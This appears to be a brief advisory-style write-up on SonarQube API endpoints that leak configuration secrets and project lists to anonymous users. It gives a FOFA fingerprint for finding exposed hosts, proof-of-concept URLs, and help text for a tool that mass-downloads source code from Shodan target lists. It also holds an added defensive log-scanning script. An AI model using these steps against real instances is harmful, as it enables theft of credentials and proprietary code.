Vulnerability description
An API endpoint in SonarQube has an information disclosure vulnerability that can expose part of the instance's sensitive configuration.
Affected products
- SonarQube
FOFA
- app=”sonarQube-代码管理”
Reproduction
PoC
http://xxx.xxx.xxx.xxx/api/settings/values
The data that can be leaked includes sensitive settings such as plaintext SMTP, SVN and GitLab details.
SonarQube search_projects project information disclosure vulnerability
- app=”sonarQube-代码管理”
PoC: verification
http://xxx.xxx.xxx.xxx/api/components/search_projects
The source code of the listed projects can be downloaded with the following tool:
https://github.com/deletescape/sloot
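As an added defensive example (not part of the original write-up or the sloot project): a small Python script that scans reverse-proxy access logs for successful, unauthenticated requests to the two endpoints named above, so an operator can tell whether an instance has already been read anonymously. It assumes a combined-format access log from a proxy in front of SonarQube; the sample log lines are constructed.

```python
import re
from collections import Counter

# Endpoints named in the write-up that expose settings and project lists
# when SonarQube permits anonymous access.
SENSITIVE_ENDPOINTS = ("/api/settings/values", "/api/components/search_projects")

# Assumed log layout: combined format written by a reverse proxy in front of SonarQube.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) \S+" (?P<status>\d{3})'
)

def find_anonymous_leaks(lines):
    """Return (ip, path, timestamp) for each 200 response to a sensitive
    endpoint where the proxy recorded no authenticated user."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that do not match the expected format
        path = m["path"].split("?", 1)[0]  # drop query string before comparing
        if path in SENSITIVE_ENDPOINTS and m["user"] == "-" and m["status"] == "200":
            hits.append((m["ip"], path, m["ts"]))
    return hits

def summarize(hits):
    """Count anonymous leak hits per source IP."""
    return Counter(ip for ip, _, _ in hits)

# Constructed sample log lines, not taken from any real server.
SAMPLE_LOG = [
    '203.0.113.7 - - [01/May/2023:10:00:01 +0000] "GET /api/settings/values HTTP/1.1" 200 5123',
    '203.0.113.7 - - [01/May/2023:10:00:03 +0000] "GET /api/components/search_projects?ps=500 HTTP/1.1" 200 8841',
    '198.51.100.4 - alice [01/May/2023:10:02:11 +0000] "GET /api/settings/values HTTP/1.1" 200 5123',
    '198.51.100.9 - - [01/May/2023:10:03:00 +0000] "GET /api/settings/values HTTP/1.1" 401 73',
    '198.51.100.9 - - [01/May/2023:10:03:05 +0000] "GET /dashboard HTTP/1.1" 200 1200',
]

if __name__ == "__main__":
    hits = find_anonymous_leaks(SAMPLE_LOG)
    for ip, path, ts in hits:
        print(f"{ts} anonymous read of {path} from {ip}")
    print(summarize(hits))
```

Authenticated reads (a user name in the log), denied requests (401) and unrelated paths are ignored, so only the anonymous successful reads that this write-up describes are reported.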
Help
Usage of ./sloot:
-alsologtostderr
log to standard error as well as files
-color
colorize the console output (default true)
-log_backtrace_at value
when logging hits line file:N, emit a stack trace
-log_dir string
If non-empty, write log files in this directory
-logtostderr
log to standard error instead of files
-n Doesn't download discovered projects, and only prints info about them
-q Don't print non-fatal errors
-s string
Path to a Shodan download file with hosts to run against
-stderrthreshold value
logs at or above this threshold go to stderr
-v value
log level for V logs
-verbose
Print every file being downloaded
-vmodule value
comma-separated list of pattern=N settings for file-filtered logging